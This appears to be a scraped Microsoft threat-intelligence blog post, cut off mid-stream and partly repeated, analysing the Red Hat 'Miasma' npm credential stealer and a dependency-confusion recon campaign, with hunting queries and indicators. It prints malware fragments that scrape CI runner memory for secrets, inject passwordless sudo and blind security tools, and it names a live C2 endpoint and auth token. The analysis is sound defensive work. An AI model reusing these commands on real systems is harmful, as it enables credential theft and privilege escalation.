| where RemoteUrl has "registry.npmjs.org/-/npm/v1/tokens"
or RemoteUrl has "registry.npmjs.org/-/whoami"
| project Timestamp, DeviceName, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine
Linux CI runner detection (process tree)
# For Linux runners not managed by Defender, use these shell commands: # Detect: npm preinstall spawning bun from /tmp ps aux | grep -E '/tmp/b-[a-z0-9]+/bun' # Detect: payload writes to /tmp/p*.js inotifywait -m /tmp -e create | grep '^/tmp/p.*\.js$'
| Indicator | Type | Description |
| @ redhat-cloud-services | Package scope | All packages maintained by the @redhat-cloud-service account were compromised. |
| Index.js | File name | Malicious script or dropped file |
| 396cac9e457ec54ff6d3f6311cb5cc1da8054d019ce3ffa1de5741506c7a4ea4 | Sha256 | Index.js (from redhat-cloud-services/remediations-client) |
| d8d170af3de17bb9b217c52aaaffdf9395f35ef015a57ef676e406c121e5e223 | Sha256 | index.js (from @redhat-cloud-services/frontend-components-advisor-components-3.8.2) |
| f0641e053e81f0d01fa46db35a83e0a34494886503086866d956d14e81fd3e1c | Sha256 | index.js (from @redhat-cloud-services/hcc-kessel-mcp-0.3.4) |
| d5a97614d5319ce9c8e01fa0b4eb06fb5b9e54fa13b23d718174a1546444123b | Sha256 | index.js (from @redhat-cloud-services/frontend-components-testing-1.2.4) |
| f88258e21592084a2f93a572ade8f9b91c0cd0e242f5cf6121ed7bad0f7bdd1f | Sha256 | index.js (from @redhat-cloud-services/frontend-components-notifications-6.9.3) |
| 25e121e3b7d300c0d0075b33e5eca39a3e6a659fb9cfee52b70ef71686628f1b | Sha256 | index.js (from @redhat-cloud-services/chrome-2.3.4) |
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign appeared first on Microsoft Security Blog.
Microsoft Threat Intelligence identified a large-scale npm supply chain attack affecting 32 maliciously modified packages across more than 90 versions under the @redhat-cloud-services npm scope. The compromise originated from the upstream RedHatInsights/javascript-clients Continuous Integration and Continuous Delivery (CI/CD) pipeline, allowing attackers to publish trojanized packages through the legitimate GitHub Actions OpenID Connect (OIDC) publishing workflow. As a result, the malicious packages carried authentic provenance signatures while embedding the campaign marker “Miasma: The Spreading Blight.”
Once installed, the trojanized packages triggered an npm preinstall hook that executed a heavily obfuscated 4.29 MB dropper script. Through multiple layers of obfuscation and encryption, the malware downloaded the Bun JavaScript runtime and launched a secondary payload designed to harvest credentials from GitHub, npm, Amazon Web Service (AWS), Azure, Google Cloud Platform (GCP), HashiCorp Vault, Kubernetes, and developer systems. The malware also attempted to propagate by compromising additional maintainer packages and, in some scenarios, could destroy the maintainer’s home directory.
The payload operated across Linux, macOS, and Windows by dynamically downloading the correct Bun runtime for each platform, although Linux CI/CD runners appeared to be the primary target. On developer systems, the malware stole Secure Shell (SSH) keys, command-line interface (CLI) credentials, browser and wallet data, while in CI/CD environments it scraped GitHub Actions runner memory for secrets, escalated privileges using passwordless sudo, and republished poisoned packages with forged Supply-chain Levels for Software Artifacts (SLSA) provenance to continue downstream propagation. Microsoft shared its findings with the npm team, leading to the removal of affected repositories and the implementation of additional protections on the @redhat-cloud-services namespace to prevent unauthorized publishing.
At a high level, the malware payload progresses through 10 phases:
The payload replaces the legitimate index.js with a single-line obfuscated script.
Stage 0 – Malicious preinstall trigger: The attack begins in package.json, where a weaponized preinstall hook automatically executes during npm install, allowing the malware to run through both direct and transitive dependency installation. The modified packages also replaced the original index.js while leaving source-map metadata unchanged, indicating probable release-pipeline tampering.
Stage 1 – Multi-layer JavaScript obfuscation: The 4.29 MB index.js dropper uses layered obfuscation, beginning with a large character-code array reconstructed at runtime, decoded through a ROT-XX (Caesar cipher) transformation, and dynamically executed via eval().
Stage 2 – AES-encrypted payloads and Bun runtime abuse: The next layer decrypts two AES-128-GCM encrypted blobs: one downloads the Bun runtime from official Bun infrastructure, while the second contains the primary payload. The malware then executes the payload via Bun, creating an unusual process chain (node → shell → bun → payload) designed to evade Node-focused monitoring and detections.
Stage 3 – Obfuscator.io string-array protection: The Bun-executed payload is additionally protected using Obfuscator.io techniques, including rotated string arrays, decoder functions, and hundreds of alias wrappers that conceal nearly every string and identifier from static analysis.
Stage 4 – Custom cryptographic string cipher: Sensitive strings remain protected behind a bespoke encryption routine that derives keys using PBKDF2-HMAC-SHA-256 with 200,000 iterations, followed by multiple SHA-256-seeded permutation and XOR stages, significantly complicating reverse engineering and static extraction.
The payload targets secrets across multiple providers:
The payload locates the GitHub Actions Runner.Worker PID using /proc scanning, then extracts runtime secrets using the following:
// Locates Runner.Worker PID via /proc 'findRunnerWorkerPIDLinux' // Scans /proc//cmdline for "Runner.Worker" // Extracts secrets from process memory tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' | sort -u
This activity bypasses normal secret masking by reading secrets directly from runner process memory.
The payload performs the following actions to escalate its privileges:
// Injects passwordless sudo via /etc/sudoers.d bind mount at /mnt echo 'runner ALL=(ALL) NOPASSWD:ALL' > && chmod 0440 /mnt/runner // Neutralize Security product monitoring sudo sh -c "echo '127.0.0.1' >> /etc/hosts" // Validates sudo access before operations sudo -n true
The malware abuses GitHub and victim-owned assets instead of a single easy-to-block C2 endpoint:
Channel A (victim-owned repo drop): Creates a public repo in the victim’s GitHub account (“Miasma: The Spreading Blight”) and commits stolen credential JSON to results/<timestamp>-<counter>.json. Repo names are randomized (adjective-creature-<0–99999>), spreading indicators.
Channel B (code propagation): Injects its own source as .github/setup.js into non-protected branches across victim-owned repos via Git Data API (blob → tree → commit → ref update). Skips protected/default branches and common bot/release branches; uses chore: update dependencies [skip ci] with spoofed github-actions@github.com.
Channel C (dormant HTTPS sender): Includes a disabled POST path to api.anthropic.com:443/v1/api (noop: true in this sample). The same domain is used to validate stolen Anthropic keys (for example, ~/.claude.json), indicating a swappable live exfiltration path.
C2 is not tied to one account; it rotates across a pool of 16 attacker-controlled GitHub accounts per session. Stolen tokens are double-Base64 encoded in transit, and traffic is masked with python-requests/2.31.0 user-agent spoofing
The malware spreads across repositories while maintaining access through credential theft, supply-chain forgery, and destructive safeguards:
This attack has a wide blast radius, affecting packages, credentials, and downstream systems.
Our investigation uncovered the following affected packages and versions.
| Package (@redhat-cloud-services/…) | Malicious versions |
| types | 3.6.1, 3.6.2, 3.6.4 |
| frontend-components-utilities | 7.4.1, 7.4.2, 7.4.4 |
| frontend-components | 7.7.2, 7.7.3, 7.7.5 |
| rbac-client | 9.0.3, 9.0.4, 9.0.6 |
| javascript-clients-shared | 2.0.8, 2.0.9, 2.0.11 |
| frontend-components-config-utilities | 4.11.2, 4.11.3, 4.11.5 |
| frontend-components-notifications | 6.9.2, 6.9.3, 6.9.5 |
| tsc-transform-imports | 1.2.2, 1.2.4, 1.2.6 |
| frontend-components-config | 6.11.3, 6.11.4, 6.11.6 |
| eslint-config-redhat-cloud-services | 3.2.1, 3.2.2, 3.2.4 |
| host-inventory-client | 5.0.3, 5.0.4, 5.0.6 |
| rule-components | 4.7.2, 4.7.3, 4.7.5 |
| frontend-components-remediations | 4.9.2, 4.9.3, 4.9.5 |
| frontend-components-translations | 4.4.1, 4.4.2, 4.4.4 |
| vulnerabilities-client | 2.1.9, 2.1.11 |
| frontend-components-advisor-components | 3.8.2, 3.8.4, 3.8.6 |
| entitlements-client | 4.0.11, 4.0.12, 4.0.14 |
| chrome | 2.3.1, 2.3.2, 2.3.4 |
| notifications-client | 6.1.4, 6.1.5, 6.1.7 |
| compliance-client | 4.0.3, 4.0.4, 4.0.6 |
| sources-client | 3.0.10, 3.0.11, 3.0.13 |
| integrations-client | 6.0.4, 6.0.5, 6.0.7 |
| frontend-components-testing | 1.2.1, 1.2.2, 1.2.4 |
| remediations-client | 4.0.4, 4.0.5, 4.0.7 |
| insights-client | 4.0.4, 4.0.5, 4.0.7 |
| topological-inventory-client | 3.0.10, 3.0.11, 3.0.13 |
| config-manager-client | 5.0.4, 5.0.5, 5.0.7 |
| hcc-pf-mcp | 0.6.1, 0.6.2, 0.6.4 |
| quickstarts-client | 4.0.11, 4.0.12, 4.0.14 |
| patch-client | 4.0.4, 4.0.5, 4.0.7 |
| hcc-feo-mcp | 0.3.1, 0.3.2, 0.3.4 |
| hcc-kessel-mcp | 0.3.1, 0.3.2, 0.3.4 |
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| Initial access / Execution | Suspicious script execution during npm install or package lifecycle activity | Microsoft Defender Antivirus – Trojan:JS/ShaiWorm.DAW!MTB – Trojan:JS/ObfusNpmJs Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious installation of Bun runtime Microsoft Defender XDR – Suspicious file creation in temporary directory by node.exe – Suspicious Bun execution from Node.js process |
| Execution / Defense evasion | Four-layer obfuscation (ROT XX) → AES-128-GCM → string-array → custom cipher); Bun runtime download and execution to move off Node.js; process lineage node → sh → bun to evade detection | Microsoft Defender for Endpoint – Suspicious usage of Bun runtime – Suspicious installation of Bun runtime – Suspicious Node.js process behavior – Suspicious script execution via Bun Microsoft Defender for Cloud – Suspicious supply-chain compromise activity detected |
| Credential access | Multi-platform harvester targeting GitHub, npm, AWS IMDS/ECS, Azure IMDS, GCP, Vault, K8s, CircleCI; runner process-memory scraping to unmask secrets; anthropic API key theft | Microsoft Defender for Endpoint – Credential access attempt – Kubernetes secrets enumeration indicative of credential access Microsoft Defender for Cloud – Sha1-Hulud Campaign Detected: Possible command injection to exfiltrate credentials Microsoft Defender for Identity – Anomalous token request patterns – Suspicious enumeration of organizational secrets |
| Exfiltration | Public GitHub repo creation under victim’s account with stolen credential JSON; Git Data API commits to non-protected branches; domain-sender fallback to (dormant) api.anthropic.com | Microsoft Defender for Cloud Apps – Suspicious GitHub API activity (repo creation, commit patterns) – Unusual data volume in commits – Authentication from unusual IP/location |
| Impact / Worm propagation | npm OIDC token exchange republishing; forged Sigstore/SLSA provenance; self-injection (.github/setup.js) into victim repos on non-protected branches | Microsoft Defender for Cloud Apps – Suspicious npm package republish via OIDC – Anomalous use of bypass_2fa parameter – Packages publish from unusual location/time |
Microsoft Defender XDR customers can reference the Threat analytics report for this campaign in the Microsoft Defender portal at https://security.microsoft.com/threatanalytics3 for the latest indicators, recommended actions, and mitigation status across their estate.
The following KQL queries can be used in Microsoft Defender XDR Advanced Hunting to identify potential exposure to this supply-chain compromise.
Bun execution from temporary directories
DeviceProcessEvents
| where FileName == "bun" or ProcessCommandLine has "bun run"
| where FolderPath startswith "/tmp/" or FolderPath startswith @"C:\Users\*\AppData\Local\Temp"
| project Timestamp, DeviceName, InitiatingProcessFileName,
ProcessCommandLine, FolderPath, AccountName
| sort by Timestamp desc
Bun execution from temporary directory (CloudProcessEvents)
CloudProcessEvents
| where Timestamp > ago(7d)
| where ProcessName =~ "bun"
or ProcessCommandLine has "bun run"
| where FolderPath startswith "/tmp/"
or ProcessCommandLine matches regex @"/tmp/[^ ]*bun"
| project Timestamp, TenantId, AzureResourceId,
KubernetesNamespace, KubernetesPodName,
ContainerName, ContainerImageName, ContainerId,
AccountName,
ProcessName, FolderPath, ParentProcessName, ProcessCommandLine,
UpperLayer = tostring(AdditionalFields.UpperLayer),
DriftAction = tostring(AdditionalFields.DriftAction),
Memfd = tostring(AdditionalFields.Memfd)
| sort by Timestamp desc
Bun download activity
CloudProcessEvents
| where Timestamp > ago(7d)
| where ProcessName in~ ("curl","wget")
| where ProcessCommandLine matches regex
@"https?://[^\s""']*?(github\.com/oven-sh/bun/releases|release-assets\.githubusercontent\.com/[^\s""']*?bun-(linux|darwin|windows)|/bun-(linux|darwin|windows)-(x64|aarch64|arm64)\.zip)"
| extend BunUrl = extract(
@"(https?://[^\s""']*?(?:github\.com/oven-sh/bun/releases|release-assets\.githubusercontent\.com/[^\s""']*?bun-(?:linux|darwin|windows)|/bun-(?:linux|darwin|windows)-(?:x64|aarch64|arm64)\.zip)[^\s""']*)",
1, ProcessCommandLine),
OutputPath = extract(@"-[oO]\s+[""']?(\S+?)[""']?(\s|$)", 1, ProcessCommandLine)
| project Timestamp, TenantId, AzureResourceId,
KubernetesNamespace, KubernetesPodName,
ContainerImageName, ContainerId,
ProcessName, ParentProcessName, ParentProcessId,
BunUrl, OutputPath, ProcessCommandLine,
UpperLayer = tostring(AdditionalFields.UpperLayer)
| sort by Timestamp desc
npm → Node → Bun process chain
DeviceProcessEvents
| where InitiatingProcessFileName in ("node", "node.exe")
| where FileName == "bun" or FileName == "bun.exe"
| join kind=inner (
DeviceProcessEvents
| where InitiatingProcessFileName in ("npm", "npm.cmd")
| where FileName in ("node", "node.exe")
) on DeviceId, $left.InitiatingProcessId == $right.ProcessId
| project Timestamp, DeviceName, AccountName,
NpmCommandLine = ProcessCommandLine1,
BunCommandLine = ProcessCommandLine
Cloud metadata endpoint access from build processes
DeviceNetworkEvents
| where RemoteIP in ("169.254.169.254", "169.254.170.2")
| where InitiatingProcessFileName in ("node", "node.exe", "bun", "bun.exe")
| project Timestamp, DeviceName, RemoteIP, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine
GitHub repository creation activity
CloudAppEvents
| where ActionType == "CreateRepository" or RawEventName == "repo.create"
| where Application == "GitHub"
| where AccountType == "ServiceAccount" or ActorType has "Integration"
| project Timestamp, AccountDisplayName, ActionType, RawEventName,
IPAddress, City, CountryCode
Process memory access (runner scraping)
DeviceProcessEvents
| where FileName == "grep"
| where ProcessCommandLine has_all ("value", "isSecret\":true")
npm token enumeration
DeviceNetworkEvents
| where RemoteUrl has "registry.npmjs.org/-/npm/v1/tokens"
or RemoteUrl has "registry.npmjs.org/-/whoami"
| project Timestamp, DeviceName, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine
Linux CI runner detection (process tree)
# For Linux runners not managed by Defender, use these shell commands: # Detect: npm preinstall spawning bun from /tmp ps aux | grep -E '/tmp/b-[a-z0-9]+/bun' # Detect: payload writes to /tmp/p*.js inotifywait -m /tmp -e create | grep '^/tmp/p.*\.js$'
| Indicator | Type | Description |
| @ redhat-cloud-services | Package scope | All packages maintained by the @redhat-cloud-service account were compromised. |
| Index.js | File name | Malicious script or dropped file |
| 396cac9e457ec54ff6d3f6311cb5cc1da8054d019ce3ffa1de5741506c7a4ea4 | Sha256 | Index.js (from redhat-cloud-services/remediations-client) |
| d8d170af3de17bb9b217c52aaaffdf9395f35ef015a57ef676e406c121e5e223 | Sha256 | index.js (from @redhat-cloud-services/frontend-components-advisor-components-3.8.2) |
| f0641e053e81f0d01fa46db35a83e0a34494886503086866d956d14e81fd3e1c | Sha256 | index.js (from @redhat-cloud-services/hcc-kessel-mcp-0.3.4) |
| d5a97614d5319ce9c8e01fa0b4eb06fb5b9e54fa13b23d718174a1546444123b | Sha256 | index.js (from @redhat-cloud-services/frontend-components-testing-1.2.4) |
| f88258e21592084a2f93a572ade8f9b91c0cd0e242f5cf6121ed7bad0f7bdd1f | Sha256 | index.js (from @redhat-cloud-services/frontend-components-notifications-6.9.3) |
| 25e121e3b7d300c0d0075b33e5eca39a3e6a659fb9cfee52b70ef71686628f1b | Sha256 | index.js (from @redhat-cloud-services/chrome-2.3.4) |
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign appeared first on Microsoft Security Blog.
Microsoft Threat Intelligence has uncovered an active supply chain attack involving malicious npm packages registered under organizational scopes that mirror real internal corporate namespaces, employing dependency confusion technique to deploy an obfuscated reconnaissance payload.
On May 28 and May 29, 2026, a threat actor operating under three maintainer aliases mr.4nd3r50n (mr.4nd3r50n@yandex[.]ru), ce-rwb (ogvanta@yandex[.]ru), and t-in-one (t-in-one@yandex[.]ru) published malicious packages across two publishing bursts. The packages impersonate internal corporate packages across nine different organizational scopes using a dependency confusion technique, and several spoof internal enterprise infrastructure URLs (GitHub Enterprise, Jira, documentation portals) in their package.json to appear legitimate. Once installed, the packages download and execute an obfuscated reconnaissance payload from an attacker-controlled command-and-control (C2) server.
All packages in the cluster ship the same heavily obfuscated postinstall stager and connect to the same C2 endpoint, a ~17 KB JavaScript dropper used for for environment fingerprinting and credential reconnaissance. The payload runs silently during npm install and operates in “reconnaissance-only” mode, collecting system information, hostnames, environment variables, and developer context. The architecture includes a RECON_ONLY flag that can be toggled server-side for full exploitation in follow-on attacks. Based on our investigation and feedback to the npm team these repos and users were taken down.
Key capabilities observed in the campaign include automatic execution through npm lifecycle hooks, obfuscator.io-style anti-analysis techniques, platform-specific payload delivery (Windows, macOS, Linux), continuous integration and continuous delivery (CI/CD) environment detection and bypass, cache-based deduplication to evade repeated-execution monitoring, and a two-phase attack design (reconnaissance now, exploitation later).
The campaign spans dozens of scoped packages published under three npm maintainer accounts that our forensic analysis attributes to a single operator (detailed in the Attribution section below). The attack proceeds through:
The actor adopted three social-engineering techniques designed to drive installs through misconfigured package managers or developer trust transference:
The attacker registered packages under organizational scopes that mirror real internal corporate namespaces: @cloudplatform-single-spa, @wb-track, @data-science, @ce-rwb, @payments-widget, @travel-autotests, @t-in-one, @capibar.chat, and @sber-ecom-core. Package names like svp-baas, enterprise, monitoring, ssh-keys, shared-front, payments-widget-sdk, add_application_service_token, ui-kit, and sberpay-widget target specific internal services — the last of which directly impersonates Sberbank’s SberPay payment widget.
Every package sets its package.json homepage, repository, bugs, and author fields to fabricated but realistic-looking internal infrastructure URLs. For example:
These URLs follow the pattern of enterprise GitHub, Jira, and documentation portals, lending an air of legitimacy designed to evade casual inspection during code review.
mr.4nd3r50n uses version 100.100.100, an absurdly high version number designed to win npm’s server resolution against any real internal package version. ce-rwb uses a more realistic 3.5.22 to blend in with legitimate release histories. t-in-one mixes both tactics: the ten @t-in-one packages ship at 5.7.1, while @capibar.chat/ui-kit (99.5.7) and @sber-ecom-core/sberpay-widget (99.5.8) use inflated numbers — and both of the latter scopes were pre-staged with 99.0.7 releases on 2026-05-04, weeks before the main bursts.
npm install. Version 100.100.100 ensures the malicious package wins dependency resolution over any real internal version.Every package in the cluster declares an automatic install-time hook in package.json:
"scripts": {
"build": "tsc --noEmit || true",
"test": "node test/index.test.js",
"postinstall": "node scripts/postinstall.js",
"prepublishOnly": "echo 'Building...'"
}
The malicious code executes the moment a victim runs npm install; no require() from victim code is needed. The build and test scripts are cosmetic, designed to make the package appear to have a legitimate development workflow.
scripts/postinstall.js is approximately 7 KB of heavily obfuscated JavaScript using obfuscator.io-style techniques:
The deobfuscated execution flow proceeds through eight distinct stages:
The environment variables passed to the spawned payload reveal a deliberate two-phase attack architecture:
| Variable | Purpose |
| *_RECON_ONLY | Set to “1” by default; limits payload to reconnaissance |
| *_PKG | Identifies which internal package triggered the execution |
| *_VER | Package version for campaign tracking |
| *_SECRET | Hard-coded authentication token for C2 communication |
The RECON_ONLY flag is hard-coded to “1” in the current campaign, indicating the attacker is in Reconnaissance — collecting environment information, hostnames, installed packages, and developer context. The architecture supports a Full exploitation mode where the flag can be toggled server-side to enable data exfiltration, credential theft, or backdoor installation on previously fingerprinted targets.
This two-phase design is sophisticated: it minimizes the risk of detection during initial deployment while building a target inventory for selective, high-value exploitation later.
Forensic analysis of npm registry metadata across every package in the cluster provides high-confidence evidence that the three accounts (mr.4nd3r50n, ce-rwb, and t-in-one) are operated by the same individual. The single strongest piece of evidence is a shared hardcoded authentication value, l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1, sent as the X-Secret HTTP header on every outbound C2 request from every package in all three accounts.
Both accounts’ payloads connect to the exact same C2 server: https://oob.moika[.]tech/payload. Sharing offensive infrastructure across “separate” personas is the strongest single indicator of a single operator. Maintaining separate C2 servers would be trivial, so using the same one indicates the shared infrastructure supports our assessment that the activity is associated with a single operator.
mr.4nd3r50n’s early versions (v99.99.99) were published with Node.js 20.20.1 / npm 10.8.2. ce-rwb’s packages were published with Node.js 20.20.0 / npm 10.8.2. t-in-one’s @t-in-one packages were published with Node.js 20.20.1 / npm 10.8.2 — matching mr.4nd3r50n exactly. The minor variance across the three accounts suggests the same machine at slightly different patch levels, or a small set of machines configured from the same provisioning script.
Both actors use the exact same templating system for generating fake package metadata:
This level of template consistency, down to identical changelog entries across every package, including the @t-in-one README that points developers at a fabricated internal registry at npm.t-in-one[.]io with matching docs.t-in-one[.]io and jira.t-in-one[.]io references — indicates a single automated package generator.
mr.4nd3r50n published 26 packages between 18:47–18:51 UTC on May 28. ce-rwb published 7 packages between 19:02–19:03 UTC on May 28 — a 12-minute gap consistent with one person completing one publishing batch, switching npm accounts, and starting the next. t-in-one returned the following day, publishing 10 @t-in-one packages between 09:01:56 and 09:02:39 UTC on May 29 (a 43-second automated burst), with the @capibar.chat and @sber-ecom-core republishes following minutes later. The ~14-hour overnight gap between ce-rwb and t-in-one, paired with the unchanged C2 host and identical X-Secret, indicates the same operator returning to expand the campaign rather than a separate group.
The @cloudplatform-single-spa/logaas package reveals a critical piece of the actor’s history:
This timeline shows mr.4nd3r50n began as a bug bounty researcher probing npm dependency confusion in April 2024 followed by the malicious packages observed in this campaign.y approximately two years later. The ce-rwb account has no prior publishing history, suggesting it was created specifically for the May 2026 campaign as a secondary persona to broaden the attack surface across additional organizational scopes.
All packages use the scope @cloudplatform-single-spa:
| Package | Description |
| svp-baas | Database/Backend-as-a-Service |
| enterprise | Enterprise platform |
| vpn | VPN service |
| monitoring | Monitoring platform |
| dataplatform-trino | Trino data platform |
| marketplace-gigachat | GigaChat marketplace |
| support | Support tools |
| svp-s3-storage | S3 storage service |
| ml-ai-agents-agent | ML/AI agents |
| ssh-keys | SSH key management |
| security-groups | Security groups |
| employees | Employee directory |
| cp-api-gw | API gateway |
| base-static-page | Static page framework |
| administration | Administration panel |
| ml-ai-agents-agent-system | AI agent system |
| arenadata-db | ArenaData database |
| business-solutions | Business solutions |
| dataplatform-metastore | Data metastore |
| cloud-dns | Cloud DNS |
| dataplatform | Data platform |
| datagrid | Data grid |
| floating-ips | Floating IP management |
| cnapp-ui | CNAPP security UI |
| svp-interfaces | SVP interfaces |
| logaas | Logging-as-a-Service |
| Package | Scope Targeted |
| @wb-track/shared-front | WB-Track (warehouse/logistics tracking) |
| @data-science/llm | Data Science / LLM platform |
| @ce-rwb/ce-tools-editor-admin | CE-RWB internal editor tools |
| @ce-rwb/ce-tools-editor-render | CE-RWB internal editor tools |
| @ce-rwb/ce-tools-editor-core | CE-RWB internal editor tools |
| @payments-widget/payments-widget-sdk | Payments processing SDK |
| @travel-autotests/npm-proto | Travel platform test protobuf |
t-in-one returned on May 29 with a third npm account, t-in-one (t-in-one@yandex[.]ru), and expanded the campaign across three previously unused scopes. The ten @t-in-one package names are deliberately credential- and token-themed so they read as internal auth modules; @capibar.chat/ui-kit is a textbook dependency confusion artifact against an internal UI kit; and @sber-ecom-core/sberpay-widget directly impersonates Sberbank’s SberPay payment widget — making the campaign’s financial-sector targeting explicit. Unlike the May 28 wave, the May 29 stager ships a three-layer-obfuscated postinstall (~13 KB) and adds a functional T_IN_ONE_NO_TELEMETRY kill switch and a run-once marker directory at ~/.cache/._t-in-one_init/. The C2 host, payload endpoints, and hardcoded X-Secret value are identical to the May 28 wave.
| Package | Scope Targeted |
| @t-in-one/add_application | T-in-one — credential/auth module |
| @t-in-one/add_app_middleware_token | T-in-one — credential/auth module |
| @t-in-one/get_application_hid | T-in-one — credential/auth module |
| @t-in-one/form_product_token | T-in-one — credential/auth module |
| @t-in-one/application_id_storage_key_token | T-in-one — credential/auth module |
| @t-in-one/only_difference_payload | T-in-one — credential/auth module |
| @t-in-one/prefill_credit_data_token | T-in-one — credential/auth module |
| @t-in-one/prefill_bundle_data_token | T-in-one — credential/auth module |
| @t-in-one/add_application_tid | T-in-one — credential/auth module |
| @t-in-one/add_application_service_token | T-in-one — credential/auth module |
| @capibar.chat/ui-kit | Capibar Chat — internal UI kit |
| @sber-ecom-core/sberpay-widget | Sberbank — impersonation of SberPay payment widget |
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender Antivirus detects and blocks the obfuscated postinstall stager and the detached recon payload on access. During reproduction in our analysis environment, the dropped ._<scope>_init.js stager was automatically quarantined the moment the package tarball was extracted to disk, preventing the C2 beacon to oob.moika[.]tech and blocking the platform-specific second-stage download. Microsoft Defender for Endpoint provides additional behavior-based coverage for the npm lifecycle script-abuse and detached child-process patterns observed in this campaign.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
| Tactic | Observed activity | Microsoft Defender coverage |
| Execution | Suspicious script execution during npm install or package lifecycle activity tied to the affected scopes | Microsoft Defender Antivirus – Trojan:JS/ObfusNpmJs.SA Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious detached child process spawned with windowsHide=true – Suspicious file creation in temporary directory by Node.js binary |
| Defense Evasion | Three-layer-obfuscated postinstall.js (obfuscator.io + custom base64 + integer-shuffle string table) and install-time kill switch (T_IN_ONE_NO_TELEMETRY) | Microsoft Defender Antivirus – Trojan:JS/ObfusNpmJs Microsoft Defender for Endpoint – Suspicious obfuscated JavaScript execution – Anomalous environment variable usage in npm lifecycle script |
| Credential Access | Reconnaissance and potential harvesting of environment variables, tokens, and developer secrets via the detached payload | Microsoft Defender for Endpoint – Credential access attempt – Suspicious cloud credential access by npm-spawned process – Environment variable enumeration indicative of credential access Microsoft Defender for Cloud – Possible command injection to exfiltrate credentials from a build pipeline |
| Command and Control | Outbound HTTPS connections from build systems or developer machines to oob.moika[.]tech carrying the hardcoded X-Secret header | Microsoft Defender for Endpoint – Connection to a custom network indicator – Suspicious outbound connection from Node.js process to low-reputation domain |
| Persistence | Run-once marker directory at ~/.cache/._t-in-one_init/ and ._<scope>_init.js payloads dropped in os.tmpdir() and launched with detached: true | Microsoft Defender for Endpoint – Suspicious persistence file creation in user cache directory – Detached Node.js process surviving parent npm install exit |
Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.
Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:
Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.
Microsoft Defender XDR customers can reference the Threat analytics report for this campaign in the Microsoft Defender portal at https://security.microsoft.com/threatanalytics3 for the latest indicators, recommended actions, and mitigation status across their estate.
The following sample queries let you search for a week’s worth of events. To explore up to 30 days of raw data, go to the Advanced Hunting page > Query tab, and update the time range to Last 30 days.
Hunt for suspicious npm lifecycle script execution involving the affected scopes.
Searches for Node.js and npm activity involving install lifecycle behavior and references to the nine affected scoped packages.
DeviceProcessEvents
| where FileName in~ ("node.exe", "npm.cmd", "npm.exe", "npx.cmd", "npx.exe")
| where ProcessCommandLine has_any ("preinstall", "postinstall", "install")
| where ProcessCommandLine has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
"@t-in-one", "@capibar.chat", "@sber-ecom-core")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for affected package versions in software inventory.
Searches device software inventory for any installed packages from the affected scopes.
DeviceTvmSoftwareInventory
| where SoftwareName has_any (
"cloudplatform-single-spa", "wb-track", "data-science",
"ce-rwb", "payments-widget", "travel-autotests",
"t-in-one", "capibar.chat", "sber-ecom-core")
| project DeviceName, OSPlatform, SoftwareVendor, SoftwareName,
SoftwareVersion
Hunt for outbound C2 activity to oob.moika[.]tech.
Searches for any device network connection to the campaign C2 host.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "oob.moika.tech"
or RemoteUrl has_any ("npm.t-in-one.io", "docs.t-in-one.io",
"jira.t-in-one.io")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for suspicious outbound activity from Node.js processes.
Searches for network connections initiated by Node.js or npm processes referencing the affected scopes or node_modules paths.
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("node.exe", "npm.exe", "npx.exe")
| where InitiatingProcessCommandLine has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
